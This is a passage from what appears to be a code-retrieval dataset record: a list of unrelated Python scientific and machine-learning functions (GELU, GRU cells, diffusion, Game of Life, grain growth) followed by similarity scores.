C[0,0] = 306.2; C[0,1] = 112.5; C[0,2] = 112.5; C[0,3] = 0.; C[0,4] = 0.; C[0,5] = 0.\n C[1,0] = C[0,1]; C[1,1] = 306.2; C[1,2] = 112.5; C[1,3] = 0.; C[1,4] = 0.; C[1,5] = 0.\n C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 306.2; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.\n C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 92.7; C[3,4] = 0.; C[3,5] = 0.\n C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 92.7; C[4,5] = 0.\n C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 92.7\n\n return C, rho", "def g(self, t, s, u):\n P, g = s\n return np.matrix([self.Toc * P])", "def get_gru_node_gene(key, config):\n gene1 = GruNodeGene(key, config, input_keys=[-1], 
input_keys_full=[-1, -2])\n gene1.activation = 'a'\n gene1.bias_hh = np.zeros(gene1.bias_hh.shape)\n gene1.bias_ih = np.zeros(gene1.bias_ih.shape)\n gene1.weight_hh = np.zeros(gene1.weight_hh.shape)\n gene1.weight_ih_full = np.zeros(gene1.weight_ih_full.shape)\n gene1.update_weight_ih()\n gene2 = GruNodeGene(key, config, input_keys=[-1], input_keys_full=[-1, -3])\n gene2.activation = 'b'\n gene2.bias_hh = np.ones(gene2.bias_hh.shape)\n gene2.bias_ih = np.ones(gene2.bias_ih.shape)\n gene2.weight_hh = np.ones(gene2.weight_hh.shape)\n gene2.weight_ih_full = np.ones(gene2.weight_ih_full.shape)\n gene2.update_weight_ih()\n return gene1, gene2", "def _sample_gumbel(self, shape, eps=1e-20):\r\n U = tf.random_uniform(shape, minval=0, maxval=1)\r\n return -tf.log(-tf.log(U + eps) + eps)", "def riemannian_grads(self):\n u = self.feature_embedding.weight.grad\n x = self.feature_embedding.weight.data\n u.narrow(-1, 0, 1).mul_(-1)\n u.addcmul_(ldot(x, u, keepdim=True).expand_as(x), x)\n return u # can be delete?", "def create_glider_gun(i, j, grid):\n\n ggun = np.zeros(11*38).reshape(11, 38)\n\n ggun[5][1] = ggun[5][2] = 1\n ggun[6][1] = ggun[6][2] = 1\n\n ggun[3][13] = ggun[3][14] = 1\n ggun[4][12] = ggun[4][16] = 1\n ggun[5][11] = ggun[5][17] = 1\n ggun[6][11] = ggun[6][15] = ggun[6][17] = ggun[6][18] = 1\n ggun[7][11] = ggun[7][17] = 1\n ggun[8][12] = ggun[8][16] = 1\n ggun[9][13] = ggun[9][14] = 1\n\n ggun[1][25] = 1\n ggun[2][23] = ggun[2][25] = 1\n ggun[3][21] = ggun[3][22] = 1\n ggun[4][21] = ggun[4][22] = 1\n ggun[5][21] = ggun[5][22] = 1\n ggun[6][23] = ggun[6][25] = 1\n ggun[7][25] = 1\n\n ggun[3][35] = ggun[3][36] = 1\n ggun[4][35] = ggun[4][36] = 1\n\n grid[i:i+11, j:j+38] = ggun", "def _get_gpos ( self ):\n bpos = mgrid[self.x_min:self.x_max:self.nxsteps*1j, \\\n self.y_min:self.y_max:self.nysteps*1j, \\\n self.z:self.z+0.1]\n bpos.resize((3, self.size))\n return bpos", "def n_rings(self) -> ir.IntegerValue:\n return ops.GeoNRings(self).to_expr()", "def build_gru_model(num_features,\n embedding_size=None,\n kernel_size=None,\n filters=None,\n pool_size=None,\n gru_output_size=None):\n # Embedding\n if embedding_size is None:\n embedding_size = 64\n\n # Convolution\n if kernel_size is None:\n kernel_size = 5\n if filters is None:\n filters = 64\n if pool_size is None:\n pool_size = 4\n\n # GRU\n if gru_output_size is None:\n gru_output_size = 70\n\n print('Build model...')\n\n gru_model = models.gru(num_features,\n embedding_size=embedding_size,\n kernel_size=kernel_size,\n filters=filters,\n pool_size=pool_size,\n gru_output_size=gru_output_size)\n\n return gru_model", "def gelu(self, x):\r\n cdf = 0.5 * (1.0 + tf.tanh(\r\n (np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))\r\n return x * cdf", "def mkrngs(self):\n self.bkg[[0, -1]] = False\n bkgr = self.Time[self.bkg ^ np.roll(self.bkg, -1)]\n self.bkgrng = np.reshape(bkgr, [bkgr.size // 2, 2])\n\n self.sig[[0, -1]] = False\n sigr = self.Time[self.sig ^ np.roll(self.sig, 1)]\n self.sigrng = np.reshape(sigr, [sigr.size // 2, 2])\n\n self.trn[[0, -1]] = False\n trnr = self.Time[self.trn ^ np.roll(self.trn, 1)]\n self.trnrng = np.reshape(trnr, [trnr.size // 2, 2])", "def mu(self):\n return self.mass * G", "def gelu(x):\n cdf = 0.5 * (1.0 + tf.math.erf(x / tf.math.sqrt(2.0)))\n return x * cdf", "def tau2g(td, tr, r=2000):\n itau_1 = 1/td\n itau_2 = 1/tr\n\n inv_subs = 1/(itau_1-itau_2)\n # from dayan abott 5.34\n norm = -itau_1 * np.power(itau_1/itau_2, itau_2*inv_subs) * inv_subs\n (g1, g2) = (np.exp(-1/td/r)+np.exp(-1/tr/r), 
-np.exp(-1/td/r) * np.exp(-1/tr/r))\n return (g1, g2), norm", "def unit(self):\n return self._unit", "def gelu(features, approximate=False, name=None):\n with ops.name_scope(name, \"Gelu\", [features]):\n features = ops.convert_to_tensor(features, name=\"features\")\n if not features.dtype.is_floating:\n raise ValueError(\n \"`features.dtype` must be a floating point tensor.\"\n f\"Received:features.dtype={features.dtype}\")\n if approximate:\n coeff = math_ops.cast(0.044715, features.dtype)\n return 0.5 * features * (\n 1.0 + math_ops.tanh(0.7978845608028654 *\n (features + coeff * math_ops.pow(features, 3))))\n else:\n return 0.5 * features * (1.0 + math_ops.erf(\n features / math_ops.cast(1.4142135623730951, features.dtype)))", "def uvgrid(self):\n if self.baselines_type != \"grid_centres\":\n ugrid = np.linspace(-self.uv_max, self.uv_max, self.n_uv + 1) # +1 because these are bin edges.\n return (ugrid[1:] + ugrid[:-1]) / 2\n else:\n # return the uv\n return self.baselines", "def calc_gravitational_energy(self):\n\n star = self.star\n\n M, K, N = star.mesh_size\n ph = star.phi_coords\n mu = star.mu_coords\n r = star.r_coords\n\n def S1(j, k):\n sum = 0\n\n for i in range(0, M - 2, 2):\n sum += (1 / 6) * (ph[i + 2] - ph[i]) * (star.rho[i, j, k] * star.Phi[i, j, k] + 4 *\n star.rho[i + 1, j, k] * star.Phi[i + 1, j, k] +\n star.rho[i + 2, j, k] * star.Phi[i + 2, j, k])\n return 2 * sum\n\n def S2(k):\n sum = 0\n\n for j in range(0, K - 2, 2):\n sum += (1 / 6) * (mu[j + 2] - mu[j]) * \\\n (S1(j, k) + 4 * S1(j + 1, k) + S1(j + 2, k))\n\n return 2 * sum\n\n W = 0\n\n for k in range(0, N - 2, 2):\n W -= 0.5 * (1 / 6) * (r[k + 2] - r[k]) * (r[k]**2 * S2(k) +\n 4 * r[k + 1]**2 * S2(k + 1) +\n r[k + 2]**2 * S2(k + 2))\n\n return W", "def N_gfun(self,y):\n return 0.0", "def diffusion(nt, nx, tmax, xmax, nu):\n # Increments\n dt = tmax/(nt-1)\n dx = xmax/(nx-1)\n plate_length = xmax\n max_iter_time = tmax\n\n alpha = nu\n delta_x = dx\n delta_t = (delta_x ** 2)/(4 * alpha)\n \n x = np.zeros(nx)\n t = np.zeros(nt)\n\n #delta_t = (delta_x ** 2)/(4 * alpha)\n gamma = (alpha * delta_t) / (delta_x ** 2)\n\n # Initialize solution: the grid of u(k, i)\n u = np.empty((nx, nt))\n\n # Initial condition everywhere inside the grid\n u_initial = np.random.uniform(low=28.5, high=55.5, size=(nx))\n\n # Boundary conditions\n u_top = 100\n u_bottom = 0.0\n\n # Set the initial condition\n u[:,0] = u_initial\n\n # Set the boundary conditions\n u[(nx-1):,:] = u_top\n u[:1,:] = u_bottom\n\n if dt <= (dx**2)/(2*alpha):\n print(\"you are lucky\")\n else: \n print(\"hmmm\",dt,(dx**2)/(4*alpha))\n for k in range(0, nt-1):\n for i in range(1, nx-1):\n u[i,k + 1] = gamma * (u[i+1][k] + u[i-1][k] - 2*u[i][k]) + u[i][k]\n\n\n # X Loop\n for i in range(0,nx):\n x[i] = i*dx\n # T Loop\n for i in range(0,nt):\n t[i] = i*dt\n return u, x, t", "def gelu(x):\n cdf = 0.5 * (1.0 + tf.tanh(\n (np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))\n return x * cdf", "def build_grains(self):\n\t\ttime = datetime.datetime.now()\n\t\tif self.probability == 0:\n\t\t\tfor cell in self.space.flat:\n\t\t\t\tif cell.state != 0 :\n\t\t\t\t\tcontinue\n\t\t\t\telif self.check_empty_neighbours(cell):\n\t\t\t\t\tcontinue\n\t\t\t\telse:\t\n\t\t\t\t\tneighbours = self.get_neighbours(cell)\n\t\t\t\t\tgrains = [0 for i in range(self.grains)]\n\t\t\t\t\tfor i in range(1,self.grains+1):\n\t\t\t\t\t\tfor neighbour in neighbours:\n\t\t\t\t\t\t\tif neighbour.state == i and neighbour.timestamp < time:\n\t\t\t\t\t\t\t\tgrains[i] = grains[i] + 1\n\t\t\t\t\tif 
grains == [0 for i in range(self.grains)]:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tnew_grain = 0\n\t\t\t\t\tfor i in range(self.grains):\n\t\t\t\t\t\tif grains[i] >= new_grain:\n\t\t\t\t\t\t\tnew_grain = i\n\t\t\t\t\tcell.change_state(time, new_grain)\n\t\t\t\t\tself.empty_cells = self.empty_cells - 1\n\t\telse:\n\t\t\tfor cell in self.space.flat:\n\t\t\t\tif cell.state != 0 :\n\t\t\t\t\tcontinue\n\t\t\t\telif self.check_empty_neighbours(cell):\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tneighbours = self.get_neighbours(cell)\n\t\t\t\t\tif self.decide_changing(cell,neighbours,5, time):\n\t\t\t\t\t\tneighbours = self.get_nearest_neighbours(cell)\n\t\t\t\t\t\tif self.decide_changing(cell,neighbours,3, time):\n\t\t\t\t\t\t\tneighbours = self.get_further_neighbours(cell)\n\t\t\t\t\t\t\tif self.decide_changing(cell,neighbours,3, time):\n\t\t\t\t\t\t\t\tneighbours = self.get_neighbours(cell)\n\t\t\t\t\t\t\t\tgrains = [0 for i in range(self.grains)]\n\t\t\t\t\t\t\t\tfor i in range(1,self.grains+1):\n\t\t\t\t\t\t\t\t\tfor neighbour in neighbours:\n\t\t\t\t\t\t\t\t\t\tif neighbour.state == i and neighbour.timestamp < time:\n\t\t\t\t\t\t\t\t\t\t\tgrains[i] = grains[i] + 1\n\t\t\t\t\t\t\t\tif grains == [0 for i in range(self.grains)]:\n\t\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\tnew_grain = 0\n\t\t\t\t\t\t\t\tfor i in range(self.grains):\n\t\t\t\t\t\t\t\t\tif grains[i] >= new_grain:\n\t\t\t\t\t\t\t\t\t\tnew_grain = i\n\t\t\t\t\t\t\t\trandom_number = random.random() * 100\n\t\t\t\t\t\t\t\tif random_number <= self.probability:\n\t\t\t\t\t\t\t\t\tcell.change_state(time, new_grain)\n\t\t\t\t\t\t\t\t\tself.empty_cells = self.empty_cells - 1\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tcontinue", "def test_regularization_0size_interval(self):\n reg = modelgen.get_regularization(2, 2)\n assert reg == 0.01", "def show_gf(self, x):\n g = np.zeros((len(x[0]), self._num_fu), dtype=np.float64)\n for j in range(self._num_fu):\n x1 = self._gf[j*5]\n x2 = self._gf[j*5+1]\n x3 = self._gf[j*5+2]\n w = self._gf[j*5+3]\n a = self._gf[j*5+4]\n r1 = pow((x[0]-x1), 2)+pow((x[1]-x2), 2)+pow((x[2]-x3), 2)\n g[:, j] = a*np.exp(-r1/abs(w))\n\n return g", "def g_tensor(self,gpara,gperp):\n gx = gperp\n gy = gperp\n gz = gpara\n\n self.gx = gx\n self.gy = gy\n self.gz = gz\n self.g_grid = np.array([[gx*gx, gx*gy, gx*gz],[gy*gx, gy*gy, gy*gz],[gz*gx, gz*gy, gz*gz]])\n # rotate the crystal coordinates so that I'm now in the coordinate system \n # given by the zeeman tensor's principal axes", "def gelu(x):\n cdf = 0.5 * (1.0 + tf.tanh(\n (np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))\n return x * cdf", "def ez_grrec(self, ez):\n assert(ez['TOTREV'].dtype.type in [np.int64, np.float64])\n assert(ez['SALEOTHG'].dtype.type in [np.int64, np.float64])\n assert(ez['DIREXP'].dtype.type in [np.int64, np.float64])\n assert(ez['GOODS'].dtype.type in [np.int64, np.float64])\n\n return ez['TOTREV'] + ez['SALEOTHG'] + ez['DIREXP'] + ez['GOODS']", "def __call__(self, inputs, state, scope=None):\n with tf.variable_scope(scope or type(self).__name__): # \"GRUCell\"\n with tf.variable_scope(\"Gates\"): # Reset gate and update gate.\n # We start with bias of 1.0 to not reset and not udpate.\n #pudb.set_trace()\n # k1 x k2 x Ox x Oh where k1 x k2 is the convolutional kernel spatial\n # size.\n Wzconv = tf.nn.conv2d(inputs, self.W_z, [1,1,1,1], padding='SAME')\n Uzconv = tf.nn.conv2d(state, self.U_z, [1,1,1,1], padding='SAME')\n Wrconv = tf.nn.conv2d(inputs, self.W_r, [1,1,1,1], padding='SAME')\n Urconv = tf.nn.conv2d(state, self.U_r, [1,1,1,1], 
padding='SAME')\n # sig(W_r * x_t + U_r * h_t-1 )\n u = tf.sigmoid(Wzconv + Uzconv)\n r = tf.sigmoid(Wrconv + Urconv)\n with tf.variable_scope(\"Candidate\"):\n # tanh(W * x_t + U * (r_t dot h_t-1) not confident yet.\n Wconv = tf.nn.conv2d(inputs, self.W, [1,1,1,1], padding='SAME')\n Uconv = tf.nn.conv2d(r*state, self.U, [1,1,1,1], padding='SAME')\n c = tf.tanh(tf.add(Wconv,Uconv))\n new_h = u * state + (1 - u) * c\n # output, state is (batch_size, H=7, W=7, num_units)\n return new_h, new_h" ]
[ "0.721755", "0.66543376", "0.6298048", "0.62718433", "0.5896392", "0.5840149", "0.57050383", "0.5683324", "0.56716853", "0.5620621", "0.56158394", "0.56078464", "0.55852866", "0.5582799", "0.5549927", "0.55428386", "0.5535521", "0.551115", "0.5498461", "0.54404557", "0.53838044", "0.5368872", "0.5368872", "0.5326926", "0.5260689", "0.52561486", "0.52371895", "0.5236806", "0.5217655", "0.5193848", "0.5186525", "0.51761734", "0.51667035", "0.5163425", "0.5160295", "0.5160155", "0.51465744", "0.514465", "0.5144243", "0.51429844", "0.51423895", "0.514231", "0.51370233", "0.5118049", "0.5105011", "0.5098842", "0.508409", "0.5072621", "0.50689495", "0.50426406", "0.50398207", "0.5039162", "0.5037784", "0.5031988", "0.5026528", "0.5025733", "0.502459", "0.502329", "0.5019964", "0.501895", "0.5011777", "0.50063854", "0.50025004", "0.5001995", "0.49983016", "0.49971732", "0.49958703", "0.4988914", "0.49875882", "0.49850437", "0.4983952", "0.4983894", "0.4972529", "0.49713758", "0.49653408", "0.49611047", "0.49599284", "0.49584672", "0.49562526", "0.49514744", "0.4942497", "0.49400172", "0.4937415", "0.49372083", "0.4931685", "0.49262974", "0.49261764", "0.4925521", "0.4921685", "0.4917517", "0.49143642", "0.4912441", "0.4907359", "0.49030432", "0.49029237", "0.49019137", "0.48960748", "0.48960194", "0.4895004", "0.48946247", "0.4894137" ]
0.0
-1
create base passwords for consumer threads to crypt
def generate_data(q, maxlen=2, minlen=1): alphabet = 'ab' alphabet = printable for l in range(minlen, maxlen+1): for s in product(alphabet, repeat=l): q.put( ''.join(s) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def passwordGen() :\n\treturn __randomString(12)", "def generate_password(c, user=\"root\"):\n passw = subprocess.run(\n [\n \"nix\",\n \"run\",\n \"--inputs-from\",\n \".#\",\n \"nixpkgs#xkcdpass\",\n \"--\",\n \"-d-\",\n \"-n3\",\n \"-C\",\n \"capitalize\",\n ],\n text=True,\n check=True,\n stdout=subprocess.PIPE,\n ).stdout.strip()\n hash = subprocess.run(\n [\n \"nix\",\n \"run\",\n \"--inputs-from\",\n \".#\",\n \"nixpkgs#mkpasswd\",\n \"--\",\n \"-m\",\n \"sha-512\",\n \"-s\",\n ],\n text=True,\n check=True,\n stdout=subprocess.PIPE,\n input=passw,\n ).stdout.strip()\n print(\"# Add the following secrets\")\n print(f\"{user}-password: {passw}\")\n print(f\"{user}-password-hash: {hash}\")", "def generate_pw(self):\n\n chunks = []\n for chunk_no in range(self.CHUNKS):\n if chunk_no < self.chunk:\n chunks.append(self.verified_chunks[chunk_no])\n elif chunk_no == self.chunk:\n chunks.append(str(self.counter).zfill(self.PASSWORD_LENGTH /\n self.CHUNKS))\n else:\n chunks.append(\"000\")\n\n return \"\".join(chunks)", "def password(self, password):\n self.password_hash = generate_password_hash(password)", "async def password_generate_complex(self, ctx):\n await ctx.send(\n \"\".join(\n random.choice(string.ascii_letters[:94]) for i in range(random.randint(20, 35))\n )\n )", "def pre_hash(masterpw, password, args):\n salt_hasher = hmac.new(masterpw, digestmod=DIGEST)\n\n if args.salt_url is not None:\n print(\"[INFO] Using resource at URL as salt ...\")\n with urlopen(args.salt_url) as f:\n while True:\n data = f.read(128)\n if len(data) != 0:\n salt_hasher.update(data)\n else:\n break\n\n key_len = int(math.ceil((math.log(len(default_charlist), 2) * args.len_chars) / 8))\n key = pbkdf2(password, salt_hasher.digest(),\n iter_count=args.iterations, dk_len=key_len,\n digest=DIGEST)\n return base_charlist_encode(key, default_charlist)", "def generate_password(plain_password, salt):\n return crypt(plain_password, \"$6$%s\" % salt)", "def password_builder():\n password = Credentials.password_buidler()\n return password", "def store_passwd(self, clr_passwd):\n aes_cipher = AESCipher()\n self.__aes_key = aes_cipher.AES_KEY\n self.__password = aes_cipher.encrypt(clr_passwd)", "def main():\n\n print(\"Password Generator Service\")\n # If no input is given by user then the maximum length password is genearted\n lengthOfPassword = int(input(\"Enter length of password (8 or greater) or leave blank to generate a password of maximum length i.e. 77 characters\\n\") or int(77))\n # Additional Input Validation\n if lengthOfPassword < 8 or lengthOfPassword > 77:\n print(\"Invalid Entry. Enter a value that is 8 or greater and less than 77 characters as they make secure passwords. 
Please try again\")\n sys.exit()\n\n upperCaseLowerLimit = 65\n upperCaseUpperLimit = 90\n\n lowerCaseLowerLimit = 97\n lowerCaseUpperLimit = 122\n\n specialSymbolsLowerLimit = 33\n specialSymbolsUpperLimit = 47\n\n upperCaseList = [chr(i) for i in range(upperCaseLowerLimit, upperCaseUpperLimit + 1)]\n lowerCaseList = [chr(i) for i in range(lowerCaseLowerLimit, lowerCaseUpperLimit + 1)]\n specialSymbolsList = [chr(i) for i in range(specialSymbolsLowerLimit, specialSymbolsUpperLimit + 1)]\n numbersList = [i for i in range(0,10)]\n\n \"\"\"\n To generate random characters of even greater length the list might have to be duplicated\n This has not be done now due to practical reasons.\n Sample code for doing so can be seen below\n random.sample(upperCaseList*2, len(upperCaseList)*2)\n \"\"\"\n possibleSymbols = random.sample(upperCaseList, len(upperCaseList)) + random.sample(lowerCaseList, len(lowerCaseList)) \\\n + random.sample(specialSymbolsList, len(specialSymbolsList)) + random.sample(numbersList, len(numbersList))\n # the core functionality that determines the complex password\n random.shuffle(possibleSymbols)\n\n finalPassword = ''.join(str(s) for s in possibleSymbols[:lengthOfPassword])\n\n print(\"Your new password of length {} is generated ==> {}\".format(lengthOfPassword, finalPassword))", "def passwd(self, plaintext):\n self._password = bcrypt.generate_password_hash(plaintext.encode('utf8')).decode('utf8')", "def passwordGen(self):\n password = ''\n while len(password) < self.length:\n ls = []\n if self.numeric: ls.append(random.choice(list(string.digits)))\n if self.lower : ls.append(random.choice(list(string.ascii_lowercase)))\n if self.upper : ls.append(random.choice(list(string.ascii_uppercase)))\n if self.symbol : ls.append(random.choice(list(string.punctuation)))\n if not ls: sys.exit(0)\n random.shuffle(ls)\n if self.length - len(password) > len(ls):\n password += ''.join(ls) \n else:\n password += ''.join(ls[:self.length - len(password)])\n\n return password", "def generate_password():\n chars = string.ascii_letters + string.digits\n key = random.sample(chars, 10)\n keys = \"\".join(key)\n return keys", "def giveReadablePassword():\n import random\n words = [\n 'Alpha',\n 'Bravo',\n 'Charlie',\n 'Delta',\n 'Echo',\n 'Foxtrot',\n 'Golf',\n 'Hotel',\n 'India',\n 'Juliet',\n 'Kilo',\n 'Lima',\n 'Mike',\n 'November',\n 'Oscar',\n 'Papa',\n 'Quebec',\n 'Romeo',\n 'Sierra',\n 'Tango',\n 'Uniform',\n 'Victor',\n 'Whiskey',\n 'Xray',\n 'Yankee',\n 'Zulu']\n\n chars = [\n '!',\n '#',\n '$',\n '%',\n '&',\n '*',\n '-',\n '.',\n ':',\n '?',\n '@' \n ]\n\n\n random.seed()\n pw = ''\n pw += random.choice(words)\n pw += random.choice(words)\n pw += random.choice(chars)\n pw += \"{:04d}\".format(random.randint(0,10000))\n return pw", "def password(self, value):\n self.password_hashed = func.crypt(value, func.gen_salt('bf'))", "def genpass(length):\n password = \"\"\n choice = string.ascii_letters + string.digits\n for i in range(length):\n password += random.choice(choice)\n return password", "def make_random_passphrase():\n import random\n prng = random.SystemRandom()\n templates = ['aababbab', 'aabbabab', 'aabbabba', 'abaabbab', 'abababab',\n 'abababba', 'ababbaab', 'ababbaba', 'abbaabab', 'abbaabba',\n 'abbabaab', 'abbababa', 'abbabbaa', 'baababab', 'baababba',\n 'baabbaab', 'baabbaba', 'babaabab', 'babaabba', 'bababaab',\n 'babababa', 'bababbaa', 'babbaaba', 'babbabaa']\n alphabet = {'a':\"aeiou\", 'b':list(\"bcdfghjklmnprsvwxyz\") + [\"ch\",\"ph\",\"st\"]}\n for n in (1,2,3):\n 
template = prng.choice(templates)\n password = \"\".join([prng.choice(alphabet[c]) for c in template])\n print password.capitalize() + prng.choice(\"0123456789\"),\n return 0", "def gen_hash(self, data):\n password_gen = crypt.encrypt(data)\n return password_gen", "def generate(self):\n\n four_digits = random.choice(string.ascii_uppercase) + random.choice(string.ascii_lowercase) + \\\n random.choice(string.digits) + random.choice(string.punctuation)\n\n if self.pass_length == 4:\n\n # if password is 4 letter long\n self.shuffle_pass(four_digits)\n else:\n\n # if password length is higher than 4 it add some printable letter and add to the four_digit variable\n diff = self.pass_length - 4\n password_long = ''\n i = 1\n while i <= diff:\n i += 1\n p = random.choice(string.printable)\n password_long += p\n self.shuffle_pass(four_digits + password_long)", "def create_password(self):\r\n alphabet = string.ascii_letters + string.digits\r\n password = ''.join(secrets.choice(alphabet) for i in range(30))\r\n\r\n QtWidgets.QMessageBox.information(self, \"Password generated\", \r\n \"{}\".format(password))", "def generate_password():\n return urlsafe_b64encode(urandom(32)).decode('utf-8')", "def generate_pw():\n chars = string.ascii_letters + string.digits + '!@#$%^&*()'\n password = ''.join(random.choice(chars) for i in range(16))\n pyperclip.copy(password)\n print('Password copied to clipboard.')\n return password", "def genPwd(alpha, length):\n # be sure that each character is exactly once present\n alpha = list(set(alpha))\n # return the created password\n return \"\".join([random.choice(alpha) for _ in range(length)])", "def genAlphaNumPwd(length):\n return genPwd(string.ascii_letters + string.digits, length)", "def makepasswd(length = 8, strings = None):\n\n strings = strings or [\n 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',\n 'abcdefghijklmnopqrstuvwxyz',\n '0123456789',\n '+@*#%&/()=?![]{},;.:-_'\n ]\n\n stringslen = len(strings)\n\n # use at least one char from each char string\n lists = range(stringslen)\n\n for i in range(length - stringslen):\n lists.append(random.randrange(0, stringslen))\n\n random.shuffle(lists)\n\n chars = [strings[i][random.randrange(0, len(strings[i]))] for i in lists]\n\n return ''.join(chars)[:length]", "def __encrypt(self, pwd):\n enc_buff = pwd\n m = hashlib.sha256()\n for i in range(int(config.get('security.encrypt_times'))):\n tmp_buff = '-'.join([\n config.get('security.encrypt_times'),\n enc_buff,\n self.salt\n ])\n enc_buff = m.update(tmp_buff)\n enc_buff = m.hexdigest()\n return enc_buff", "def store_lc_passwd(self, clr_passwd):\n aes_cipher = AESCipher()\n self.__aes_key = aes_cipher.AES_KEY\n self.__lc_password = aes_cipher.encrypt(clr_passwd)", "def generate_password(n):\n import os\n import math\n from base64 import b64encode\n return b64encode(os.urandom(int(math.ceil(0.75*n))),'-_')[:n]", "def _load_passwords(names, length=20, generate=False):\n\n for name in names:\n filename = ''.join([env.home, name])\n if generate:\n passwd = _random_password(length=length)\n sudo('touch %s' % filename, user=env.deploy_user)\n sudo('chmod 600 %s' % filename, user=env.deploy_user)\n with hide('running'):\n sudo('echo \"%s\">%s' % (passwd, filename), user=env.deploy_user)\n if files.exists(filename):\n with hide('stdout'):\n passwd = sudo('cat %s' % filename).strip()\n else:\n passwd = getpass('Please enter %s: ' % name)\n setattr(env, name, passwd)", "def passsword(self, password):\n self.passwor_harsh = generate_password_hash(password)", "def generate_password():\n selection 
= string.ascii_letters + string.digits\n\n while True:\n password = \"\".join(secrets.choice(selection) for i in range(16))\n\n if (\n any(c.isupper() for c in password)\n and any(c.islower() for c in password)\n and any(c.isdigit() for c in password)\n ):\n break\n\n return password", "def password():\n chars = \"abcdefghijklmnopqsrtuvwxyzABCDEFGHIJKLMNOPQSRTUVWXYZ\"\\\n \"123456890!#%&-_*<>+=()\"\n return ''.join(random.sample(chars, 15))", "def password_generator(num_users=1000, password_length=20):\n\n password_list = []\n for ind in range(num_users):\n password = random.randint(0, 2 ** password_length - 1)\n password_list.append(password)\n return password_list", "def generate_passwd(length=6):\n ret = ''\n if length < 6 :\n length = 6\n elif length > 10 :\n length = 10\n for x in xrange(length) :\n if x == 3 :\n ret += '-'\n ret += chr(random.randrange(ord('a'),ord('z'),1))\n return ret", "def generate_random_password(self):\r\n self.symbols = self.__set_symbol_dict() # set new symbol subset dict\r\n self.i = randrange(len(self.symbols)) # set new dict key pointer\r\n return \"\".join(self.__get_random_symbol() for _ in range(self.pw_len))", "def set_passwords(self, passwords):\n self.passwords = {}\n for user_name in passwords:\n self.passwords[user_name] = sha512_crypt.hash(\n passwords[user_name], rounds=5000)", "def password(self) -> str:", "def _encryptDBPass():\n #run encrypt tool on user given password\n controller.CONF[\"ENCRYPTED_DB_PASS\"] = utils.encryptEngineDBPass(password=controller.CONF[\"DB_PASS\"],\n maskList=masked_value_set)", "def generate_password(self):\n password = str()\n\n length = len(self.chars_password)\n for index in range(self.length_password):\n char_index = random.randint(0, length - 1)\n password += self.chars_password[char_index]\n\n return password", "def make_hashed_password(cleartext,salt=None):\n \n if not salt:\n salt = make_salt(5)\n return \"%s|%s\" % (salt,hashlib.sha256(salt + cleartext).hexdigest())", "def make_key(password, iterations=ITERATIONS):\n key = PBKDF2(password, SALT, dkLen=KEY_LENGTH_BYTES, count=iterations)\n return key", "def build_passwords(self, project_update, runtime_passwords):\n passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)\n if project_update.credential:\n passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')\n passwords['scm_username'] = project_update.credential.get_input('username', default='')\n passwords['scm_password'] = project_update.credential.get_input('password', default='')\n return passwords", "def build_passwords(self, job, runtime_passwords):\n passwords = super(RunJob, self).build_passwords(job, runtime_passwords)\n cred = job.machine_credential\n if cred:\n for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):\n value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))\n if value not in ('', 'ASK'):\n passwords[field] = value\n\n for cred in job.vault_credentials:\n field = 'vault_password'\n vault_id = cred.get_input('vault_id', default=None)\n if vault_id:\n field = 'vault_password.{}'.format(vault_id)\n if field in passwords:\n raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))\n value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))\n if value not in ('', 'ASK'):\n passwords[field] = value\n\n '''\n Only 1 value can be provided for a unique 
prompt string. Prefer ssh\n key unlock over network key unlock.\n '''\n if 'ssh_key_unlock' not in passwords:\n for cred in job.network_credentials:\n if cred.inputs.get('ssh_key_unlock'):\n passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))\n break\n\n return passwords", "def create_password(tamanho=12):\n from random import choice\n caracters = '0123456789abcdefghijlmnopqrstuwvxzkABCDEFGHIJLMNOPQRSTUWVXZK_#'\n senha = ''\n for char in xrange(tamanho):\n senha += choice(caracters)\n return senha", "def random_password():\n\n pool = lowercase + uppercase + digits\n lowerset = set(lowercase)\n upperset = set(uppercase)\n digitset = set(digits)\n length = 10\n\n password = ''.join(choice(pool) for i in range(length - 2))\n\n # Make sure the password is compliant\n chars = set(password)\n if not chars & lowerset:\n password += choice(lowercase)\n if not chars & upperset:\n password += choice(uppercase)\n if not chars & digitset:\n password += choice(digits)\n\n # Pad if necessary to reach required length\n password += ''.join(choice(pool) for i in range(length - len(password)))\n\n return password", "def generate_password(path: str, number: int) -> str:\n password = \"\"\n for i in range(number):\n rand_line = generate_random_numbers_string()\n password += Program.find_string_by_number(rand_line, path)\n\n return password", "def generate_password(cls,password_length):\n alpha = string.ascii_letters + string.digits\n password = ''.join(random.choice(alpha)\n for i in range(password_length))\n return password", "def get_password(args):\n for password in args:\n heashed=hash_password(password)\n print(heashed)\n # checked=check_password(heashed)", "def __init__(self, username, password):\n self.username = username\n self.password = password\n self.salt = os.urandom(32)", "def set_pass(self, pw):\n\t\tself.passhash = generate_password_hash(pw)", "def slow_function(*args, **kwargs):\n print('Password generation...')\n time.sleep(2)\n password = randint(1, 10)\n return password", "def _derive_key(\n self, passphrase: str, otp: 